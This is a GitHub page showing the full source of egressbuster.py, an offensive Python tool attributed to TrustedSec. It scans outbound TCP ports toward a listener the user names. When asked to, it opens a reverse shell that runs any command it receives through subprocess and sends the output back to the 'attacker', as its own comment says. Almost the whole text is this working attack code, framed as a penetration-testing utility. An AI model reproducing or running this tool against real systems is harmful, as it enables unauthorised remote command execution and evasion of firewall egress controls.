-
Notifications
You must be signed in to change notification settings - Fork 107
/
Copy pathegressbuster.py
executable file
·181 lines (147 loc) · 4.97 KB
/
egressbuster.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
#!/usr/bin/python3
#
# TrustedSec Egressbuster Reverse Shell
#
# Written by Dave Kennedy (ReL1K)
#
# This is the actual egressbuster that will connect out from a network to the listener then spawn a shell
#
# Visit: https://www.trustedsec.com - Click on the downloads section for more.
#
import os
import socket
import subprocess
import sys
import _thread
import time
import socket
import random
import string
# How long to wait before making the next request (in seconds)
sleep = 0.01
# How long to wait before a connection is seen as invalid (in seconds)
timeout = 3
# How many threads that can be active at once
max_threads = 500
# Display more output
verbose = False
shell_connected = False
flag_length = 32
# try to import
try:
ipaddr = sys.argv[1]
except IndexError:
print("""
TrustedSec, LLC
https://www.trustedsec.com
Quick egress buster reverse shell
Written by: Dave Kennedy (ReL1K) (@HackingDave)
A TrustedSec Project
NOTE: Supports all 65536 TCP ports.
Usage: $ egressbuster.py <listener_ip_address> <lowport-highport> (optional_flag_shell)
Note that the last flag is optional. If you want a shell to spawn when a port
is detected, simply type 'shell' as the optional flag.
Example: $ egressbuster.py 10.9.5.2 1-65536 shell
""")
sys.exit()
def start_socket(ipaddr, base_port, shell):
global num_threads
global shell_connected
# increase thread count
num_threads += 1
if verbose or (base_port % 1000) == 0:
print("[v] Trying: TCP %s" % base_port)
# 3 seconds is too short if commands are going to be entered
if shell == "shell":
timeout = 300
else:
timeout = 3
# try block to catch exceptions
try:
socket.setdefaulttimeout(timeout)
sockobj = socket.socket()
sockobj.connect((ipaddr, base_port))
sockobj.send(str(base_port).encode())
print("[*] Connection made to %s on port: %s/tcp\n" % (ipaddr, base_port))
if shell == "shell" and not shell_connected:
results_terminator = '-'*5 + ''.join(random.choice(string.ascii_letters+string.digits) for i in range(flag_length)) + '-'*5
sockobj.send(results_terminator.encode())
shell_connected = True
# start loop
while 1:
# receive shell command
data = sockobj.recv(1024).decode()
# if its quit, then break out and close socket
if data == "quit":
break
# do shell command
if data.startswith("cd "):
data = data.replace("cd ", "")
cwd = os.getcwd()
if os.path.isdir(cwd + data):
if data != "/":
data = cwd + data
if os.path.isdir(data):
print(data)
os.chdir(data)
stdout_value = b'Changed directory.'
else:
stdout_value = b'Invalid directory. Be sure to use full pathnames to change directories. Not individual directories.'
else:
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
# read output
stdout_value = proc.stdout.read() + proc.stderr.read()
# send output to attacker
result_string = stdout_value.decode() + "\n" + results_terminator
sockobj.send(result_string.encode())
# close socket
sockobj.close()
# if we throw an error
except timeout:
sockobj.close()
if verbose:
print("[v] Can't use port: %s/tcp" % base_port)
# except Exception as e :
# print(e)
# pass through, ports closed
# pass
finally:
num_threads -= 1
return
# Defining default values
num_threads = 0
shell = ""
portrange = ""
lowport = 1
highport = 1024
try:
portrange = sys.argv[2]
shell = sys.argv[3]
except:
pass
if portrange:
portrange = portrange.split("-")
lowport = int(portrange[0])
highport = int(portrange[1])
# cycle through ranges
base_port = int(lowport)
end_port = int(highport)
if end_port > 65536:
print("[i] Limiting to TCP 65536...")
end_port = 65536
print("[i] Sending packets to egress listener (%s)..." % ipaddr)
print("[i] Starting at: %s/tcp, ending at: %s/tcp" % (base_port, end_port))
while base_port <= end_port:
_thread.start_new_thread(start_socket, (ipaddr, base_port, shell))
time.sleep(sleep)
while num_threads >= max_threads:
# Lower timeout value, increase max_threads or wait it out...
print("[!] On hold. max_threads limit reached (%s)" % (num_threads))
time.sleep(timeout)
base_port += 1
print("[*] All packets have been sent")
while num_threads > 0:
print("[i] Remaining threads: %s" % num_threads)
time.sleep(2)
print("[*] Done")